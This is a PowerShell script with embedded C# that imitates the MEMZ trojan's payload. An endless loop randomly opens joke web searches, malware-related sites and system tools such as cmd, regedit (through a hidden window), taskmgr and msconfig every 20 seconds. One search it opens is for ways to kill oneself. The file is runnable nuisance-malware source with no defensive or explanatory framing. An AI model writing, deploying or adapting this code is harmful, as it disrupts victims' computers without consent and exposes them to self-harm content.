 $source= @"
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows;
using System.Runtime.InteropServices;
using System.IO;
using System.Diagnostics;
using System.Media;
using System.Reflection;
using System.Threading;

　public static class Win32
{

public static void open()
{
while(true)
         {
                Random random = new Random();
                                int rnd_pgm = random.Next(46);

                {
                    if (rnd_pgm == 1)
                    {
                        Process.Start("http://google.co.ck/search?q=best+way+to+kill+yourself");
                    }
                }

                {
                    if (rnd_pgm == 2)
                    {
                        Process.Start("http://google.co.ck/search?q=how+2+remove+a+virus");
                    }
                }

                {
                    if (rnd_pgm == 3)
                    {
                        Process.Start("http://google.co.ck/search?q=mcafee+vs+norton");
                    }
                }

                {
                    if (rnd_pgm == 4)
                    {
                        Process.Start("http://google.co.ck/search?q=how+to+send+a+virus+to+my+friend");
                    }
                }

                {
                    if (rnd_pgm == 5)
                    {
                        Process.Start("http://google.co.ck/search?q=minecraft+hax+download+no+virus");
                    }
                }

                {
                    if (rnd_pgm == 6)
                    {
                        Process.Start("http://google.co.ck/search?q=how+to+get+money");
                    }
                }

                {
                    if (rnd_pgm == 7)
                    {
                        Process.Start("http://google.co.ck/search?q=bonzi+buddy+download+free");
                    }
                }

                {
                    if (rnd_pgm == 8)
                    {
                        Process.Start("http://google.co.ck/search?q=how+2+buy+weed");
                    }
                }

                {
                    if (rnd_pgm == 9)
                    {
                        Process.Start("http://google.co.ck/search?q=how+to+code+a+virus+in+visual+basic");
                    }
                }

                {
                    if (rnd_pgm == 10)
                    {
                        Process.Start("http://google.co.ck/search?q=what+happens+if+you+delete+system32");
                    }
                }

                {
                    if (rnd_pgm == 11)
                    {
                        Process.Start("http://google.co.ck/search?q=g3t+r3kt");
                    }
                }

                {
                    if (rnd_pgm == 12)
                    {
                        Process.Start("http://google.co.ck/search?q=batch+virus+download");
                    }
                }

                {
                    if (rnd_pgm == 13)
                    {
                        Process.Start("http://google.co.ck/search?q=virus.exe");
                    }
                }

                {
                    if (rnd_pgm == 14)
                    {
                        Process.Start("http://google.co.ck/search?q=internet+explorer+is+the+best+browser");
                    }
                }

                {
                    if (rnd_pgm == 15)
                    {
                        Process.Start("http://google.co.ck/search?q=facebook+hacking+tool+free+download+no+virus+working+2016");
                    }
                }

                {
                    if (rnd_pgm == 16)
                    {
                        Process.Start("http://google.co.ck/search?q=virus+builder+legit+free+download");
                    }
                }

                {
                    if (rnd_pgm == 17)
                    {
                        Process.Start("http://google.co.ck/search?q=how+to+create+your+own+ransomware");
                    }
                }
                {
                    if (rnd_pgm == 18)
                    {
                        Process.Start("http://google.co.ck/search?q=how+to+remove+memz+trojan+virus");
                    }
                }
                {
                    if (rnd_pgm == 19)
                    {
                        Process.Start("http://google.co.ck/search?q=my+computer+is+doing+weird+things+wtf+is+happenin+plz+halp");
                    }
                }
                {
                    if (rnd_pgm == 20)
                    {
                        Process.Start("http://google.co.ck/search?q=dank+memz");
                    }
                }
                {
                    if (rnd_pgm == 21)
                    {
                        Process.Start("http://google.co.ck/search?q=how+to+download+memz");
                    }
                }
                {
                    if (rnd_pgm == 22)
                    {
                        Process.Start("http://google.co.ck/search?q=half+life+3+release+date");
                    }
                }
                {
                    if (rnd_pgm == 23)
                    {
                        Process.Start("http://google.co.ck/search?q=is+illuminati+real");
                    }
                }
                {
                    if (rnd_pgm == 24)
                    {
                        Process.Start("http://google.co.ck/search?q=montage+parody+making+program+2016");
                    }
                }
                {
                    if (rnd_pgm == 25)
                    {
                        Process.Start("http://google.co.ck/search?q=the+memz+are+real");
                    }
                }
                {
                    if (rnd_pgm == 26)
                    {
                        Process.Start("http://google.co.ck/search?q=stanky+danky+maymays");
                    }
                }
                {
                    if (rnd_pgm == 27)
                    {
                        Process.Start("http://google.co.ck/search?q=john+cena+midi+legit+not+converted");
                    }
                }
                {
                    if (rnd_pgm == 28)
                    {
                        Process.Start("http://google.co.ck/search?q=vinesauce+meme+collection");
                    }
                }
                {
                    if (rnd_pgm == 29)
                    {
                        Process.Start("http://google.co.ck/search?q=skrillex+scay+onster+an+nice+sprites+midi");
                    }
                }
                {
                    if (rnd_pgm == 30)
                    {
                        Process.Start("http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/memz-malwarevirus-trojan-completely-destroying/268bc1c2-39f4-42f8-90c2-597a673b6b45");
                    }
                }
                {
                    if (rnd_pgm == 31)
                    {
                        Process.Start("http://motherboard.vice.com/read/watch-this-malware-turn-a-computer-into-a-digital-hellscape");
                    }
                }
                {
                    if (rnd_pgm == 32)
                    {
                        Process.Start("http://play.clubpenguin.com");
                    }
                }
                {
                    if (rnd_pgm == 33)
                    {
                        Process.Start("http://pcoptimizerpro.com");
                    }
                }
                {
                    if (rnd_pgm == 34)
                    {
                        Process.Start("http://softonic.com");
                    }
                }
                {
                    if (rnd_pgm == 35)
                    {
                        Process.Start("calc");
                    }
                }
                {
                    if (rnd_pgm == 36)
                    {
                        Process.Start("notepad");
                    }
                }
                {
                    if (rnd_pgm == 37)
                    {
                        Process.Start("cmd");
                    }
                }
                {
                    if (rnd_pgm == 38)
                    {
                        Process.Start("write");
                    }
                }
                {
                    if (rnd_pgm == 39)
                    {
                        ProcessStartInfo p = new ProcessStartInfo();
                        p.FileName = "cmd.exe";
                        p.Arguments = "/k regedit";
                        p.CreateNoWindow = true;
                        p.WindowStyle = ProcessWindowStyle.Hidden;
                        p.ErrorDialog = false;
                        Process.Start(p);
                    }
                }
                {
                    if (rnd_pgm == 40)
                    {
                        Process.Start("explorer");
                    }
                }
                {
                    if (rnd_pgm == 41)
                    {
                        Process.Start("taskmgr");
                    }
                }
                {
                    if (rnd_pgm == 42)
                    {
                        Process.Start("msconfig");
                    }
                }
                {
                    if (rnd_pgm == 43)
                    {
                        Process.Start("mspaint");
                    }
                }
                {
                    if (rnd_pgm == 44)
                    {
                        Process.Start("devmgmt.msc");
                    }
                }
                {
                    if (rnd_pgm == 45)
                    {
                        Process.Start("control");
                    }
                }
                {
                    if (rnd_pgm == 46)
                    {
                        Process.Start("mmc");
                    }
                }
 Thread.Sleep(20000);
        }
}
}
"@
 Add-Type -TypeDefinition $source -Language CSharp
 [Win32]::open()
